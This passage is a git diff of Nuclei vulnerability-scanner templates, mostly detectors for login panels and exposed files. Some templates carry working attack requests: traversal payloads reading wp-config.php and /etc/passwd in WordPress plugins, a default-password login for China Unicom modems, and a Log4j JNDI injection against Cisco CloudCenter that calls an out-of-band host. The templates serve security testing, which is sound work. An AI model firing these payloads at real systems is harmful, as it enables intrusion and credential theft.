'
+ - '404 Not Found
'
+ condition: and
diff --git a/nuclei-templates/Other/cas-login-870.yaml b/nuclei-templates/Other/cas-login-870.yaml
new file mode 100644
index 0000000000..b2f2d90bea
--- /dev/null
+++ b/nuclei-templates/Other/cas-login-870.yaml
@@ -0,0 +1,19 @@
+id: cas-login
+info:
+ name: CAS Login Panel
+ author: pdteam
+ severity: info
+ metadata:
+ shodan-query: http.title:'CAS - Central Authentication Service'
+ github: https://github.com/apereo/cas
+ tags: apereo,cas,panel,login
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cas/login"
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ words:
+ - 'Central Authentication Service'
diff --git a/nuclei-templates/Other/cas-login.yaml b/nuclei-templates/Other/cas-login.yaml
deleted file mode 100644
index 8a225d7e04..0000000000
--- a/nuclei-templates/Other/cas-login.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: cas-login
-
-info:
- name: CAS Login Panel
- author: pdteam
- severity: info
- tags: apereo,cas,panel,login
- metadata:
- shodan-query: http.title:'CAS - Central Authentication Service'
- github: https://github.com/apereo/cas
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cas/login"
-
- redirects: true
- max-redirects: 2
- matchers:
- - type: word
- words:
- - 'Central Authentication Service'
diff --git a/nuclei-templates/Other/centreon-detect-875.yaml b/nuclei-templates/Other/centreon-detect-875.yaml
new file mode 100644
index 0000000000..8c77644cef
--- /dev/null
+++ b/nuclei-templates/Other/centreon-detect-875.yaml
@@ -0,0 +1,24 @@
+id: centreon-detect
+
+info:
+ name: Centreon Detect
+ author: pikpikcu
+ severity: info
+ tags: tech,centreon
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/centreon/index.php"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "
Centreon - IT & Network Monitoring"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/centreon-detect-877.yaml b/nuclei-templates/Other/centreon-detect-877.yaml
deleted file mode 100644
index c3ca5df6a4..0000000000
--- a/nuclei-templates/Other/centreon-detect-877.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: centreon-detect
-
-info:
- name: Centreon Detect
- author: pikpikcu
- severity: info
- tags: tech,centreon
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/centreon/index.php"
-
- matchers-condition: and
- matchers:
-
- - type: word
- part: body
- words:
- - "
Centreon - IT & Network Monitoring"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/certificate-validation-882.yaml b/nuclei-templates/Other/certificate-validation-882.yaml
new file mode 100644
index 0000000000..c8969eea4f
--- /dev/null
+++ b/nuclei-templates/Other/certificate-validation-882.yaml
@@ -0,0 +1,12 @@
+id: improper-certificate-validation
+info:
+ name: Improper Certificate Validation
+ author: gaurang
+ severity: medium
+file:
+ - extensions:
+ - all
+ matchers:
+ - type: word
+ words:
+ - "Landroid/webkit/SslErrorHandler;->proceed()V"
diff --git a/nuclei-templates/Other/certificate-validation.yaml b/nuclei-templates/Other/certificate-validation.yaml
deleted file mode 100644
index 64a9fecc52..0000000000
--- a/nuclei-templates/Other/certificate-validation.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: improper-certificate-validation
-
-info:
- name: Improper Certificate Validation
- author: gaurang
- severity: medium
- tags: android,file
-
-file:
- - extensions:
- - all
-
- matchers:
- - type: word
- words:
- - "Landroid/webkit/SslErrorHandler;->proceed()V"
\ No newline at end of file
diff --git a/nuclei-templates/Other/cgi-printenv-886.yaml b/nuclei-templates/Other/cgi-printenv-886.yaml
index 0deacd17e0..0410dfbd68 100644
--- a/nuclei-templates/Other/cgi-printenv-886.yaml
+++ b/nuclei-templates/Other/cgi-printenv-886.yaml
@@ -1,15 +1,19 @@
id: cgi-printenv
+
info:
- author: emadshanab
name: CGI script environment variable
+ author: emadshanab
severity: medium
description: A test CGI (Common Gateway Interface) script was found on this server. The response page returned by this CGI script is leaking a list of server environment variables.
- reference: https://www.acunetix.com/vulnerabilities/web/test-cgi-script-leaking-environment-variables/
+ reference:
+ - https://www.acunetix.com/vulnerabilities/web/test-cgi-script-leaking-environment-variables/
tags: exposure,generic,cgi
+
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/printenv.pl"
+
matchers-condition: and
matchers:
- type: word
@@ -20,6 +24,7 @@ requests:
- 'SERVER_ADMIN'
- 'Environment Variables:'
condition: or
+
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/Other/cgi-test-page-890.yaml b/nuclei-templates/Other/cgi-test-page.yaml
similarity index 100%
rename from nuclei-templates/Other/cgi-test-page-890.yaml
rename to nuclei-templates/Other/cgi-test-page.yaml
diff --git a/nuclei-templates/Other/chamilo-lms-sqli-891.yaml b/nuclei-templates/Other/chamilo-lms-sqli-892.yaml
similarity index 100%
rename from nuclei-templates/Other/chamilo-lms-sqli-891.yaml
rename to nuclei-templates/Other/chamilo-lms-sqli-892.yaml
diff --git a/nuclei-templates/Other/chamilo-lms-xss.yaml b/nuclei-templates/Other/chamilo-lms-xss.yaml
index 77ecc3124b..0818c85597 100644
--- a/nuclei-templates/Other/chamilo-lms-xss.yaml
+++ b/nuclei-templates/Other/chamilo-lms-xss.yaml
@@ -1,7 +1,7 @@
id: chamilo-lms-xss
info:
name: Chamilo LMS Cross Site Scripting
- author: geeknik
+ author: nithissh
severity: medium
description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
tags: xss,chamilo
diff --git a/nuclei-templates/Other/checkmarx-panel-895.yaml b/nuclei-templates/Other/checkmarx-panel-895.yaml
deleted file mode 100644
index 70b24b66eb..0000000000
--- a/nuclei-templates/Other/checkmarx-panel-895.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: checkmarx-panel-detect
-
-info:
- name: Checkmarx WebClient detector
- author: joanbono
- severity: info
- tags: panel,checkmarx
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cxwebclient/Login.aspx"
-
- matchers:
- - type: word
- words:
- - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
- part: body
diff --git a/nuclei-templates/Other/checkmarx-panel-897.yaml b/nuclei-templates/Other/checkmarx-panel-897.yaml
new file mode 100644
index 0000000000..4aa65b0e49
--- /dev/null
+++ b/nuclei-templates/Other/checkmarx-panel-897.yaml
@@ -0,0 +1,19 @@
+id: checkmarx-panel-detect
+
+info:
+ name: Checkmarx WebClient detector
+ author: joanbono
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cxwebclient/Login.aspx"
+ headers:
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ matchers:
+ - type: word
+ words:
+ - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
+ part: body
diff --git a/nuclei-templates/Other/checkpoint-panel-899.yaml b/nuclei-templates/Other/checkpoint-panel-898.yaml
similarity index 100%
rename from nuclei-templates/Other/checkpoint-panel-899.yaml
rename to nuclei-templates/Other/checkpoint-panel-898.yaml
diff --git a/nuclei-templates/Other/cherry-lfi-903.yaml b/nuclei-templates/Other/cherry-lfi-903.yaml
new file mode 100644
index 0000000000..b0b6c0a44f
--- /dev/null
+++ b/nuclei-templates/Other/cherry-lfi-903.yaml
@@ -0,0 +1,36 @@
+id: cherry-lfi
+
+info:
+ name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
+ author: dhiyaneshDK
+ severity: high
+ description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the
+ wp-config.php file.
+ reference:
+ - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
+ - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cwe-id: CWE-22
+ tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/04/21
diff --git a/nuclei-templates/Other/cherry-lfi.yaml b/nuclei-templates/Other/cherry-lfi.yaml
deleted file mode 100644
index 7df075f0c8..0000000000
--- a/nuclei-templates/Other/cherry-lfi.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cherry-lfi
-info:
- name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
- author: dhiyaneshDK
- severity: high
- description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
- reference:
- - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
- - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
- tags: wordpress,wp-plugin,lfi,wp
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- condition: and
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/chinaunicom-default-login-906.yaml b/nuclei-templates/Other/chinaunicom-default-login-906.yaml
deleted file mode 100644
index ad88f640d7..0000000000
--- a/nuclei-templates/Other/chinaunicom-default-login-906.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: chinaunicom-default-login
-info:
- name: China Unicom Modem Default Login
- author: princechaddha
- severity: high
- description: Default login credentials were discovered for a China Unicom modem.
- classification:
- cwe-id: CWE-798
- tags: chinaunicom,default-login
-requests:
- - raw:
- - |
- POST /cu.html HTTP/1.1
- Host: {{Hostname}}
-
- frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
- attack: pitchfork
- payloads:
- username:
- - CUAdmin
- password:
- - CUAdmin
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
- - type: word
- words:
- - "/menu.gch"
- part: header
-
-# Enhanced by mp on 2022/03/03
diff --git a/nuclei-templates/Other/chinaunicom-default-login.yaml b/nuclei-templates/Other/chinaunicom-default-login.yaml
new file mode 100644
index 0000000000..0121060abf
--- /dev/null
+++ b/nuclei-templates/Other/chinaunicom-default-login.yaml
@@ -0,0 +1,28 @@
+id: chinaunicom-default-login
+info:
+ name: Chinaunicom Modem Default Login
+ author: princechaddha
+ severity: high
+ tags: chinaunicom,default-login
+requests:
+ - raw:
+ - |
+ POST /cu.html HTTP/1.1
+ Host: {{Hostname}}
+
+ frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
+ attack: pitchfork
+ payloads:
+ username:
+ - CUAdmin
+ password:
+ - CUAdmin
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+ - type: word
+ words:
+ - "/menu.gch"
+ part: header
diff --git a/nuclei-templates/Other/church-admin-lfi-912.yaml b/nuclei-templates/Other/church-admin-lfi-912.yaml
deleted file mode 100644
index 9885353c52..0000000000
--- a/nuclei-templates/Other/church-admin-lfi-912.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: church-admin-lfi
-
-info:
- name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal
- author: 0x_Akoko
- severity: high
- description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.
- reference:
- - https://wpscan.com/vulnerability/8997
- - https://id.wordpress.org/plugins/church-admin/
- tags: wordpress,wp-plugin,lfi
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/church-admin-lfi.yaml b/nuclei-templates/Other/church-admin-lfi.yaml
new file mode 100644
index 0000000000..130de762a2
--- /dev/null
+++ b/nuclei-templates/Other/church-admin-lfi.yaml
@@ -0,0 +1,28 @@
+id: church-admin-lfi
+info:
+ name: WordPress Church Admin 0.33.2.1 - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php.
+ reference:
+ - https://wpscan.com/vulnerability/8997
+ - https://id.wordpress.org/plugins/church-admin/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-22
+ tags: wordpress,wp-plugin,lfi
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/nuclei-templates/Other/circarlife-setup-920.yaml b/nuclei-templates/Other/circarlife-setup-920.yaml
new file mode 100644
index 0000000000..808a1e8646
--- /dev/null
+++ b/nuclei-templates/Other/circarlife-setup-920.yaml
@@ -0,0 +1,28 @@
+id: circarlife-setup
+info:
+ name: Exposed CirCarLife Setup Page
+ author: geeknik
+ description: CirCarLife is an internet-connected electric vehicle charging station
+ reference: https://circontrol.com/
+ severity: critical
+ tags: scada,circontrorl,circarlife,setup,exposure
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/html/setup.html"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "CirCarLife Scada"
+ - type: word
+ words:
+ - "
- setup"
+ - "Network setup"
+ - "Modem setup"
+ - "Security setup"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/circarlife-setup.yaml b/nuclei-templates/Other/circarlife-setup.yaml
deleted file mode 100644
index 13d2489404..0000000000
--- a/nuclei-templates/Other/circarlife-setup.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: circarlife-setup
-info:
- name: Exposed CirCarLife Setup Page
- author: geeknik
- description: CirCarLife is an internet-connected electric vehicle charging station
- reference: https://circontrol.com/
- severity: critical
- tags: scada,circontrorl,circarlife,setup,exposure,panel
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/html/setup.html"
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "CirCarLife Scada"
- - type: word
- words:
- - "
- setup"
- - "Network setup"
- - "Modem setup"
- - "Security setup"
- condition: and
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/circleci-config-924.yaml b/nuclei-templates/Other/circleci-config-924.yaml
new file mode 100644
index 0000000000..6483134342
--- /dev/null
+++ b/nuclei-templates/Other/circleci-config-924.yaml
@@ -0,0 +1,26 @@
+id: circleci-config
+
+info:
+ name: circleci config.yml exposure
+ author: geeknik
+ severity: low
+ reference:
+ - https://circleci.com/docs/2.0/sample-config/
+ tags: config,exposure,circleci
+
+requests:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/.circleci/config.yml"
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'regex("^version: ", body) && contains(body, "jobs:")'
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/circleci-config.yaml b/nuclei-templates/Other/circleci-config.yaml
deleted file mode 100644
index 98cf8b37cf..0000000000
--- a/nuclei-templates/Other/circleci-config.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: circleci-config
-
-info:
- name: circleci config.yml exposure
- author: geeknik
- severity: low
- reference: https://circleci.com/docs/2.0/sample-config/
- tags: config,exposure
-
-requests:
- - method: GET
- redirects: true
- max-redirects: 3
- path:
- - "{{BaseURL}}/.circleci/config.yml"
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - 'regex("^version: ", body) && contains(body, "jobs:")'
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/circleci-ssh-config.yaml b/nuclei-templates/Other/circleci-ssh-config.yaml
index 0d19b816b8..3c3d245991 100644
--- a/nuclei-templates/Other/circleci-ssh-config.yaml
+++ b/nuclei-templates/Other/circleci-ssh-config.yaml
@@ -4,7 +4,7 @@ info:
name: circleci ssh-config exposure
author: geeknik
severity: low
- tags: config,exposure,circleci
+ tags: config,exposure
requests:
- method: GET
diff --git a/nuclei-templates/Other/circleci.yaml b/nuclei-templates/Other/circleci.yaml
deleted file mode 100644
index b01e427381..0000000000
--- a/nuclei-templates/Other/circleci.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: api-circleci
-
-info:
- name: CircleCI API Test
- author: zzeitlin
- reference: https://circleci.com/docs/api/v1
- severity: info
- tags: token-spray,circleci
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://circleci.com/api/v1.1/me?circle-token={{token}}"
-
- matchers:
- - type: word
- part: body
- words:
- - '"admin"'
- - '"login"'
- condition: and
diff --git a/nuclei-templates/Other/cisco-ace-device-manager-929.yaml b/nuclei-templates/Other/cisco-ace-device-manager-929.yaml
new file mode 100644
index 0000000000..70e4205e76
--- /dev/null
+++ b/nuclei-templates/Other/cisco-ace-device-manager-929.yaml
@@ -0,0 +1,25 @@
+id: cisco-ace-device-manager
+
+info:
+ name: ACE 4710 Device Manager
+ author: dhiyaneshDk
+ severity: info
+ metadata:
+ shodan-query: html:"ACE 4710 Device Manager"
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.vm"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "
ACE 4710 DM - Login"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-ace-device-manager.yaml b/nuclei-templates/Other/cisco-ace-device-manager.yaml
deleted file mode 100644
index 09704c579f..0000000000
--- a/nuclei-templates/Other/cisco-ace-device-manager.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cisco-ace-device-manager
-
-info:
- name: ACE 4710 Device Manager
- author: dhiyaneshDk
- severity: info
- tags: panel,cisco
- metadata:
- shodan-query: 'html:"ACE 4710 Device Manager"'
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.vm"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "
ACE 4710 DM - Login"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-asa-panel.yaml b/nuclei-templates/Other/cisco-asa-panel-932.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-asa-panel.yaml
rename to nuclei-templates/Other/cisco-asa-panel-932.yaml
diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml
new file mode 100644
index 0000000000..af3f889993
--- /dev/null
+++ b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml
@@ -0,0 +1,63 @@
+id: cisco-cloudcenter-suite-log4j-rce
+
+info:
+ name: Cisco CloudCenter Suite (Log4j)- Remote Code Execution
+ author: pwnhxl
+ severity: critical
+ description: |
+ Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+ reference:
+ - https://logging.apache.org/log4j/2.x/security.html
+ - http://www.openwall.com/lists/oss-security/2021/12/10/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+ remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2021-44228
+ cwe-id: CWE-77
+ metadata:
+ fofa-query: title="CloudCenter Suite"
+ shodan-query: title:"CloudCenter Suite"
+ tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
+
+requests:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /suite-auth/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
+ Content-Type: application/json
+
+ {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+
+ - type: word
+ part: header
+ words:
+ - 'X-RateLimit-Limit-suite-gateway_suite-auth'
+
+ extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+
+# Enhanced by md on 2023/03/22
diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml
deleted file mode 100644
index 37a4dabf81..0000000000
--- a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml
+++ /dev/null
@@ -1,73 +0,0 @@
-id: cisco-cloudcenter-suite-log4j-rce
-
-info:
- name: Cisco CloudCenter Suite (Log4j) - Remote Code Execution
- author: pwnhxl
- severity: critical
- description: |
- Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
- remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
- reference:
- - https://logging.apache.org/log4j/2.x/security.html
- - http://www.openwall.com/lists/oss-security/2021/12/10/1
- - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
- cve-id: CVE-2021-44228
- cwe-id: CWE-77
- metadata:
- max-request: 1
- shodan-query: title:"CloudCenter Suite"
- fofa-query: title="CloudCenter Suite"
- tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
-variables:
- rand1: '{{rand_int(111, 999)}}'
- rand2: '{{rand_int(111, 999)}}'
-
-http:
- - raw:
- - |
- @timeout: 10s
- POST /suite-auth/login HTTP/1.1
- Host: {{Hostname}}
- Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
- Content-Type: application/json
-
- {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'X-RateLimit-Limit-suite-gateway_suite-auth'
-
- - type: word
- part: interactsh_protocol # Confirms the DNS Interaction
- words:
- - "dns"
-
- - type: regex
- part: interactsh_request
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
- extractors:
- - type: kval
- kval:
- - interactsh_ip
-
- - type: regex
- part: interactsh_request
- group: 2
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
- - type: regex
- part: interactsh_request
- group: 1
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
-# digest: 4a0a00473045022100c2f5e8163a564e7d2fd0530a85cb7e37e568e017f19c9ed7fa4652e03a0de4c602203859ca9dc699f5dec2304a7611352a5d8889ae7e4a3400870ba2608640d522fa:922c64590222798bb761d5b6d8e72950
diff --git a/nuclei-templates/Other/cisco-edge-340-936.yaml b/nuclei-templates/Other/cisco-edge-340-936.yaml
deleted file mode 100644
index 9ab8a34c07..0000000000
--- a/nuclei-templates/Other/cisco-edge-340-936.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: cisco-edge-340
-info:
- name: Cisco Edge 340
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Cisco Edge 340"
- tags: panel,cisco
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/auth/?next=%2F"
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "
Cisco Edge 340"
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-edge-340.yaml b/nuclei-templates/Other/cisco-edge-340.yaml
new file mode 100644
index 0000000000..17a60b6a18
--- /dev/null
+++ b/nuclei-templates/Other/cisco-edge-340.yaml
@@ -0,0 +1,25 @@
+id: cisco-edge-340
+
+info:
+ name: Cisco Edge 340
+ author: dhiyaneshDk
+ severity: info
+ tags: panel,cisco
+ metadata:
+ shodan-query: 'http.title:"Cisco Edge 340"'
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/auth/?next=%2F"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "
Cisco Edge 340"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-finesse-login-938.yaml b/nuclei-templates/Other/cisco-finesse-login-940.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-finesse-login-938.yaml
rename to nuclei-templates/Other/cisco-finesse-login-940.yaml
diff --git a/nuclei-templates/Other/cisco-integrated-login-941.yaml b/nuclei-templates/Other/cisco-integrated-login.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-integrated-login-941.yaml
rename to nuclei-templates/Other/cisco-integrated-login.yaml
diff --git a/nuclei-templates/Other/cisco-meraki-exposure-944.yaml b/nuclei-templates/Other/cisco-meraki-exposure-944.yaml
deleted file mode 100644
index d14835d3a6..0000000000
--- a/nuclei-templates/Other/cisco-meraki-exposure-944.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: cisco-meraki-exposure
-
-info:
- name: Cisco Meraki cloud & security Appliances Information Disclosure
- author: dhiyaneshDK,r3naissance
- severity: info
- reference:
- - https://www.exploit-db.com/ghdb/6708
- tags: panel,cisco,meraki,disclosure
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/#connection'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Your client connection'
- - 'This security appliance is directly connected to a local network'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-meraki-exposure-946.yaml b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml
new file mode 100644
index 0000000000..112800ebd8
--- /dev/null
+++ b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml
@@ -0,0 +1,25 @@
+id: cisco-meraki-exposure
+
+info:
+ name: Cisco Meraki cloud & security Appliances Information Disclosure
+ author: dhiyaneshDK,r3naissance
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6708
+ tags: panel,cisco,meraki,disclosure
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#connection'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Your client connection'
+ - 'This security appliance is directly connected to a local network'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-network-config-949.yaml b/nuclei-templates/Other/cisco-network-config-949.yaml
deleted file mode 100644
index 04d2a4045e..0000000000
--- a/nuclei-templates/Other/cisco-network-config-949.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: cisco-network-config
-
-info:
- name: Cisco System Network Configuration Exposure
- author: DhiyaneshDk
- severity: low
- reference: https://www.exploit-db.com/ghdb/5430
- tags: config,exposure,cisco,network
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Network Configuration"
- part: body
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-network-config-951.yaml b/nuclei-templates/Other/cisco-network-config-951.yaml
new file mode 100644
index 0000000000..0de9a2b420
--- /dev/null
